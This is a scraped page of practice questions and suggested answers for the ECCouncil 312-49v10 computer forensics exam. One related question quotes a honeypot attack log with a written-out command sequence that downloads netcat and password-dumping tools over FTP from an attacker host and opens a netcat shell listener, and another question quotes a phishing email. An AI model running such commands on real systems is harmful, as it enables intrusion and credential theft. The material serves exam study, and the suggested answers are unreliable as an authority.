ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 43

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 421

Report
Export
Collapse

Which of the following standard represents a legal precedent set in 1993 by the Supreme Court of the United States regarding the admissibility of expert witnesses' testimony during federal legal proceedings?

A.
SWGDE & SWGIT
A.
SWGDE & SWGIT
Answers
B.
IOCE
B.
IOCE
Answers
C.
Frye
C.
Frye
Answers
D.
Daubert
D.
Daubert
Answers
Suggested answer: D

Question 422

Report
Export
Collapse

Which of the following statements is incorrect when preserving digital evidence?

A.
Verify if the monitor is in on, off, or in sleep mode
A.
Verify if the monitor is in on, off, or in sleep mode
Answers
B.
Turn on the computer and extract Windows event viewer log files
B.
Turn on the computer and extract Windows event viewer log files
Answers
C.
Remove the plug from the power router or modem
C.
Remove the plug from the power router or modem
Answers
D.
Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals
D.
Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals
Answers
Suggested answer: B

Question 423

Report
Export
Collapse

Which of the following ISO standard defines file systems and protocol for exchanging data between optical disks?

A.
ISO 9660
A.
ISO 9660
Answers
B.
ISO/IEC 13940
B.
ISO/IEC 13940
Answers
C.
ISO 9060
C.
ISO 9060
Answers
D.
IEC 3490
D.
IEC 3490
Answers
Suggested answer: A

Question 424

Report
Export
Collapse

Lynne receives the following email:

Dear [email protected]! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24 You have 24 hours to fix this problem or risk to be closed permanently! To proceed Please Connect >> My Apple ID Thank You The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/ What type of attack is this?

A.
Mail Bombing
A.
Mail Bombing
Answers
B.
Phishing
B.
Phishing
Answers
C.
Email Spamming
C.
Email Spamming
Answers
D.
Email Spoofing
D.
Email Spoofing
Answers
Suggested answer: B

Question 425

Report
Export
Collapse

What value of the "Boot Record Signature" is used to indicate that the boot-loader exists?

A.
AA55
A.
AA55
Answers
B.
00AA
B.
00AA
Answers
C.
AA00
C.
AA00
Answers
D.
A100
D.
A100
Answers
Suggested answer: A

Question 426

Report
Export
Collapse

Which of the following is a MAC-based File Recovery Tool?

A.
VirtualLab
A.
VirtualLab
Answers
B.
GetDataBack
B.
GetDataBack
Answers
C.
Cisdem DataRecovery 3
C.
Cisdem DataRecovery 3
Answers
D.
Smart Undeleter
D.
Smart Undeleter
Answers
Suggested answer: C

Question 427

Report
Export
Collapse

Smith, an employee of a reputed forensic investigation firm, has been hired by a private organization to investigate a laptop that is suspected to be involved in the hacking of the organization's DC server.

Smith wants to find all the values typed into the Run box in the Start menu. Which of the following registry keys will Smith check to find the above information?

A.
TypedURLs key
A.
TypedURLs key
Answers
B.
MountedDevices key
B.
MountedDevices key
Answers
C.
UserAssist Key
C.
UserAssist Key
Answers
D.
RunMRU key
D.
RunMRU key
Answers
Suggested answer: D

Question 428

Report
Export
Collapse

When analyzing logs, it is important that the clocks of all the network devices are synchronized.

Which protocol will help in synchronizing these clocks?

A.
UTC
A.
UTC
Answers
B.
PTP
B.
PTP
Answers
C.
Time Protocol
C.
Time Protocol
Answers
D.
NTP
D.
NTP
Answers
Suggested answer: D

Question 429

Report
Export
Collapse

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:

A.
Type Allocation Code (TAC)
A.
Type Allocation Code (TAC)
Answers
B.
Integrated Circuit Code (ICC)
B.
Integrated Circuit Code (ICC)
Answers
C.
Manufacturer Identification Code (MIC)
C.
Manufacturer Identification Code (MIC)
Answers
D.
Device Origin Code (DOC)
D.
Device Origin Code (DOC)
Answers
Suggested answer: A

Question 430

Report
Export
Collapse

Which of the following is NOT an anti-forensics technique?

A.
Data Deduplication
A.
Data Deduplication
Answers
B.
Steganography
B.
Steganography
Answers
C.
Encryption
C.
Encryption
Answers
D.
Password Protection
D.
Password Protection
Answers
Suggested answer: A
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms